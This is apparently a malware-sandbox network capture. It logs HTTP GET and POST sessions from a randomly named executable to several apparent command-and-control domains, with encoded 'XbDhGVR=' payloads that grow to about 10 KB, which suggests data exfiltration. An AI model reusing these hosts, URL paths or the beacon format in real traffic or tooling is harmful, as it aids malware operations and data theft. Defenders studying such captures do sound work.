                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vjWD25MVEy7ZUnfiBq4G3ol13hgAtEMPPTY5ir%2B%2F4Be1RNjH%2BQPHt9Im7dT0RxVk8VYxmFC28u%2FErpXfZ%2FUcUrZkaWDgmbKsL0gCfBdcpLnM6riUmud%2Fl1syDQREd%2BHw4sZnmgoS0Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09ce6fbd2ca9-DFW
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10824&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14
                                                                                        Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1
                                                                                        Nov 1, 2024 19:44:49.639153004 CET | 1152 | IN | Data Raw: 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19
                                                                                        Data Ascii: V[7?,Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6|4m^)6}k=eYlMR<@*_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#*SC


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        16 | 192.168.2.4 | 50019 | 172.67.185.22 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 1, 2024 19:44:51.019057035 CET | 452 | OUT | GET /xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.gokulmohan.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:44:52.182286024 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Fri, 01 Nov 2024 18:44:52 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGjIi6Tab%2F8l3z5J0VGzQ%2FzRLyZtkMg1bkOk5JMBOYK0lf9XnHgQIMuIfCjBe0mBJVCzX%2BQfntbkcnkAH8O6Mrd77ym5w62cAkqo6q4cvLndmAdUvT7yZ9LJhYP488xJ2KYFRpn5aD0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbe09de3e80e853-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1370&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=452&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 61 74 20 2f 78 68 37 64 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 70 61 64 64
                                                                                        Data Ascii: ca8<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /xh7d/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padd
                                                                                        Nov 1, 2024 19:44:52.182312965 CET | 1236 | IN | Data Raw: 69 6e 67 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 3a 73 6d 61 6c 6c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 20 63 6f 6c 6f 72 3a 23 30 30 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79
                                                                                        Data Ascii: ing:0; } body { font:small sans-serif; background:#eee; color:#000; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; margin-bottom:.4em; } h1 span { font-size:60%; color:#666; font-weight:normal; } tabl
                                                                                        Nov 1, 2024 19:44:52.182332039 CET | 1236 | IN | Data Raw: 5a 49 48 69 34 4f 52 66 56 6e 66 33 66 50 34 76 78 71 6b 39 6b 30 63 51 3d 26 61 6d 70 3b 51 7a 3d 42 4a 76 70 30 42 64 68 78 58 69 54 43 54 47 50 3c 2f 74 64 3e 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 74
                                                                                        Data Ascii: ZIHi4ORfVnf3fP4vxqk9k0cQ=&amp;Qz=BJvp0BdhxXiTCTGP</td> </tr> <tr> <th>Raised by:</th> <td>django.views.static.serve</td> </tr> </table> </div> <div id="info"> <p> Using t
                                                                                        Nov 1, 2024 19:44:52.182352066 CET | 460 | IN | Data Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 2f 6f 6c 3e 0a 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                        Data Ascii: </li> </ol> <p> The current path, <code>xh7d/</code>, matched the last one. </p> </div> <div id="explanation"> <p> Youre seeing


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        17 | 192.168.2.4 | 50020 | 206.119.82.172 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 1, 2024 19:44:57.412718058 CET | 701 | OUT | POST /a3g3/ HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wddb97.top
                                                                                        Referer: http://www.wddb97.top/a3g3/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 54 52 51 66 50 44 69 33 76 54 74 64 4b 6e 73 4f 6f 66 71 46 6f 4e 32 44 5a 68 30 67 67 2b 6a 68 5a 73 71 32 71 31 7a 65 70 4f 41 76 45 62 39 73 5a 6a 32 7a 78 61 79 42 37 6d 61 2b 55 31 55 46 41 6e 70 6f 62 6d 64 6c 4b 30 55 68 38 48 31 30 41 4b 50 79 47 6b 33 79 4c 4f 2b 7a 53 58 71 46 36 37 67 34 69 4c 6d 47 48 59 56 6a 64 51 4b 7a 5a 70 36 58 55 38 6f 45 33 36 2f 6a 64 71 67 41 34 4f 6c 6d 47 45 49 47 58 50 77 2b 34 7a 50 2b 63 53 51 64 63 45 4d 31 72 4f 4e 48 55 6a 74 54 34 57 7a 70 39 5a 75 35 41 64 54 70 44 76 62 65 77 6f 59 70 74 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=9EbyNravHfVOTRQfPDi3vTtdKnsOofqFoN2DZh0gg+jhZsq2q1zepOAvEb9sZj2zxayB7ma+U1UFAnpobmdlK0Uh8H10AKPyGk3yLO+zSXqF67g4iLmGHYVjdQKzZp6XU8oE36/jdqgA4OlmGEIGXPw+4zP+cSQdcEM1rONHUjtT4Wzp9Zu5AdTpDvbewoYptg==
                                                                                        Nov 1, 2024 19:44:58.363006115 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:44:58 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        18 | 192.168.2.4 | 50021 | 206.119.82.172 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 1, 2024 19:44:59.957331896 CET | 721 | OUT | POST /a3g3/ HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wddb97.top
                                                                                        Referer: http://www.wddb97.top/a3g3/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 4a 77 67 66 4e 6b 4f 33 6a 6a 74 65 57 33 73 4f 68 2f 72 4f 6f 4e 36 44 5a 6a 59 77 67 4d 33 68 5a 4d 61 32 70 33 4c 65 6c 75 41 76 63 72 39 31 47 7a 33 39 78 61 2f 38 37 6a 36 2b 55 31 77 46 41 69 74 6f 62 58 64 6d 4c 6b 55 6a 7a 6e 31 32 59 71 50 79 47 6b 33 79 4c 4f 71 5a 53 58 79 46 35 49 34 34 6a 71 6d 46 47 59 56 67 61 51 4b 7a 64 70 36 62 55 38 70 68 33 37 54 46 64 70 49 41 34 4c 42 6d 49 31 4a 30 43 2f 77 38 79 54 4f 73 53 7a 39 4b 52 56 70 4e 30 66 78 36 64 67 46 4f 35 51 2b 7a 73 6f 50 75 53 64 33 61 65 6f 53 71 39 72 6c 67 32 72 68 73 63 30 54 33 44 39 55 6a 62 4d 30 43 78 33 45 62 4f 64 77 3d
                                                                                        Data Ascii: XbDhGVR=9EbyNravHfVOJwgfNkO3jjteW3sOh/rOoN6DZjYwgM3hZMa2p3LeluAvcr91Gz39xa/87j6+U1wFAitobXdmLkUjzn12YqPyGk3yLOqZSXyF5I44jqmFGYVgaQKzdp6bU8ph37TFdpIA4LBmI1J0C/w8yTOsSz9KRVpN0fx6dgFO5Q+zsoPuSd3aeoSq9rlg2rhsc0T3D9UjbM0Cx3EbOdw=
                                                                                        Nov 1, 2024 19:45:00.930490017 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:45:00 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        19 | 192.168.2.4 | 50022 | 206.119.82.172 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 1, 2024 19:45:02.507702112 CET | 10803 | OUT | POST /a3g3/ HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.wddb97.top
                                                                                        Referer: http://www.wddb97.top/a3g3/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 4a 77 67 66 4e 6b 4f 33 6a 6a 74 65 57 33 73 4f 68 2f 72 4f 6f 4e 36 44 5a 6a 59 77 67 4d 76 68 59 39 36 32 76 67 6e 65 6b 75 41 76 43 62 39 77 47 7a 32 68 78 61 33 34 37 6a 32 41 55 33 34 46 42 45 52 6f 64 6c 31 6d 45 6b 55 6a 32 58 31 31 41 4b 50 6e 47 6b 47 61 4c 4f 36 5a 53 58 79 46 35 4f 55 34 6b 37 6d 46 45 59 56 6a 64 51 4b 33 5a 70 36 33 55 39 4d 63 33 37 58 7a 64 59 6f 41 34 72 52 6d 45 6e 68 30 65 76 77 36 31 54 50 70 53 7a 77 4e 52 56 30 30 30 66 56 55 64 6a 5a 4f 39 47 6e 71 32 5a 43 31 47 66 2f 2f 62 72 4b 30 31 62 4a 43 35 37 49 52 59 6b 48 6a 51 73 67 70 52 76 68 49 69 46 59 6c 62 4b 66 63 50 61 74 76 6c 32 75 4a 51 4c 41 6e 79 31 6c 47 66 70 71 2b 42 54 79 2b 51 5a 52 38 50 6e 49 54 75 35 71 70 65 4e 70 6d 50 38 32 30 55 31 51 54 42 65 33 7a 54 34 4e 6b 36 53 38 6b 51 71 68 49 59 42 4a 34 46 38 33 30 4b 55 52 56 36 63 67 6d 57 66 43 4c 54 4b 75 74 78 36 37 4c 59 4d 45 62 33 50 78 35 67 50 4f 72 41 78 41 2b 63 37 34 73 2b 48 [TRUNCATED]
                                                                                        Data Ascii: XbDhGVR=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 [TRUNCATED]
Timestamp: Nov 1, 2024 19:45:03.487620115 CET | Bytes transferred: 302 | Direction: IN | Data:
                                                                                        HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:45:03 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 50023 | Destination IP: 206.119.82.172 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:05.048012972 CET | Bytes transferred: 445 | Direction: OUT | Data:
                                                                                        GET /a3g3/?XbDhGVR=wGzSOeLMOeJZKE1qNEa+jhNIWFM/28bU2ce+YDYhk9OHSMfA8Wvg3+EpArxXMTGJwIf87CGML3FOIiYWeXpTMV044XgXGpvZX0LmL4PHT1yh05kop8D3Fas=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.wddb97.top
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Timestamp: Nov 1, 2024 19:45:06.283180952 CET | Bytes transferred: 302 | Direction: IN | Data:
                                                                                        HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:45:05 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 138
                                                                                        Connection: close
                                                                                        ETag: "66aa3a46-8a"
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 50024 | Destination IP: 103.191.208.137 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:20.373266935 CET | Bytes transferred: 728 | Direction: OUT | Data:
                                                                                        POST /3m9t/ HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 204
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.roopiedutech.online
                                                                                        Referer: http://www.roopiedutech.online/3m9t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 56 47 69 55 6d 4e 67 34 4e 4b 52 33 47 52 58 6c 36 68 35 56 61 71 53 65 37 78 55 6c 6b 75 45 49 2b 77 68 71 71 32 69 77 6f 43 72 34 66 57 32 30 50 34 4f 6a 32 37 39 79 33 41 6a 50 32 73 49 6d 70 58 36 67 45 56 49 69 39 7a 66 38 58 63 54 74 42 76 6f 49 43 56 52 63 4f 6a 64 50 32 68 30 35 6e 73 42 30 30 77 32 70 74 42 6d 7a 7a 31 39 33 4b 50 71 33 43 57 63 4a 78 54 76 75 76 6f 49 67 41 34 6b 6e 78 51 37 57 64 4c 38 7a 6d 78 2f 61 50 64 66 62 67 71 33 54 49 73 41 51 2b 41 5a 56 61 54 51 73 37 64 4f 4b 4f 7a 4d 44 6f 35 42 4e 4c 4e 50 51 43 67 3d 3d
                                                                                        Data Ascii: XbDhGVR=hgmmgJ12deh1VGiUmNg4NKR3GRXl6h5VaqSe7xUlkuEI+whqq2iwoCr4fW20P4Oj279y3AjP2sImpX6gEVIi9zf8XcTtBvoICVRcOjdP2h05nsB00w2ptBmzz193KPq3CWcJxTvuvoIgA4knxQ7WdL8zmx/aPdfbgq3TIsAQ+AZVaTQs7dOKOzMDo5BNLNPQCg==


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 50025 | Destination IP: 103.191.208.137 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:22.911436081 CET | Bytes transferred: 748 | Direction: OUT | Data:
                                                                                        POST /3m9t/ HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 224
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.roopiedutech.online
                                                                                        Referer: http://www.roopiedutech.online/3m9t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Data Raw: 58 62 44 68 47 56 52 3d 68 67 6d 6d 67 4a 31 32 64 65 68 31 61 48 53 55 70 4b 4d 34 50 71 52 34 44 52 58 6c 6f 68 35 5a 61 71 65 65 37 77 42 2b 6b 63 51 49 2b 52 52 71 72 7a 43 77 72 43 72 34 51 32 32 39 46 59 4f 6b 32 37 68 55 33 46 6a 50 32 73 4d 6d 70 53 57 67 45 6d 67 6c 79 44 66 45 59 38 54 6a 46 76 6f 49 43 56 52 63 4f 6c 78 70 32 6e 63 35 6b 66 5a 30 79 52 32 71 67 68 6d 30 69 31 39 33 42 76 72 2b 43 57 64 63 78 53 44 45 76 71 41 67 41 35 55 6e 78 42 37 5a 47 37 38 78 69 78 2f 4b 4a 65 36 69 2f 4c 47 4d 41 36 55 38 2f 42 64 61 62 56 64 32 71 73 76 64 63 7a 6f 77 31 2b 49 35 47 4f 79 5a 5a 72 53 31 61 35 4a 69 58 4f 6c 2b 47 4d 51 71 34 6c 66 69 57 2b 41 3d
                                                                                        Data Ascii: XbDhGVR=hgmmgJ12deh1aHSUpKM4PqR4DRXloh5Zaqee7wB+kcQI+RRqrzCwrCr4Q229FYOk27hU3FjP2sMmpSWgEmglyDfEY8TjFvoICVRcOlxp2nc5kfZ0yR2qghm0i193Bvr+CWdcxSDEvqAgA5UnxB7ZG78xix/KJe6i/LGMA6U8/BdabVd2qsvdczow1+I5GOyZZrS1a5JiXOl+GMQq4lfiW+A=


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 50026 | Destination IP: 103.191.208.137 | Destination Port: 80 | PID: 4340 | Process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp: Nov 1, 2024 19:45:25.472213984 CET | Bytes transferred: 10830 | Direction: OUT | Data:
                                                                                        POST /3m9t/ HTTP/1.1
                                                                                        Host: www.roopiedutech.online
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-us
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 10304
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.roopiedutech.online
                                                                                        Referer: http://www.roopiedutech.online/3m9t/
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
